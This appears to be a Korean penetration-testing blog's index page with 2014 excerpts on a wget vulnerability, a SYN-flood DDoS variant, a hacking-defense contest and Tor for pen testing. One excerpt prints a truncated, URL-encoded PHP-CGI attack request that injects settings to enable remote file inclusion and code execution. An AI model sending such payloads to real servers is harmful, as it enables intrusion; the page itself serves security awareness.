본문 바로가기

모의해킹157

Wget FTP Symlink Attack Vulnerability http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html [Bug-wget] GNU wget 1.16 releasedIt is available for download here: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz and the GPG detached signatures using the key E163E1EA: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig To reduce load.. 2014. 10. 31.
새로운 형태의 디도스 공격 발견 ‘Tsunami SYN Flood Attack’ 패킷당 1000bytes의 트래픽 유발일반적인 SYN 패킷 25배 크기로 패킷 데이터양 추가해 공격http://www.boannews.com/media/view.asp?idx=43654&skind=O ▲공격대상별 공격비율Tsunami SYN-Flood Attack은 주로 ISP나 게임 회사의 데이터센터를 공격했으며 4~5Gbps의 공격이 발생했다. 기존 SYN flood Attack은 패킷당 40~60bytes의 트래픽을 유발하는데 반해 Tsunami SYN-Flood Attack은 패킷당 1000bytes의 트래픽을 유발한다.[출처]1. http://itsecuritynews.info/2014/10/12/tsunami-syn-flood-ddos-attac.. 2014. 10. 28.
제11회 해킹방어대회 개최 한국인터넷진흥원에서는 해킹사고에 대한 대응능력 향상을 위해 다음과 같이 「제11회 해킹방어대회」를 개최합니다. □ 참가대상 및 방법 o 참가대상 : 국내 모든 정보보호 담당자, 화이트해커(1개 팀당 4명 이하로 팀원 구성, 내국인으로 제한) o 참가신청 : 2014. 10. 1(수) 09:00 ~ 2014. 10. 15(수) 18:00까지 홈페이지를 통해 신청(http://hdcon.kisa.or.kr) o 기타 문의처 : hdcon@kisa.or.kr □ 대회 내용 o 개요 - 주최 : 미래창조과학부 - 주관 : 한국인터넷진흥원 - 협찬 : Microsoft, Symantec, CDNetworks o 예선 대회 - 1부 : 2014. 10. 18(토) 10:00 ~ 18:00 (8시간), 온라인 문제풀.. 2014. 9. 30.
쉘코드 웹공격 사례 샘플 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68.. 2014. 9. 4.
Tor-nonymous - Using Tor for Pen Testing [Editor's Note: In this article, Chris Crowley provides some really useful tips for using Tor to anonymize your penetration testing. He provides details on strategy and tactics, along with some helpful configuration settings and scripts. His discussion of Privoxy is especially useful. Thanks, Chris! --Ed.]By Chris CrowleyPen testing derives its value from being able to emulate the behavior of re.. 2014. 4. 30.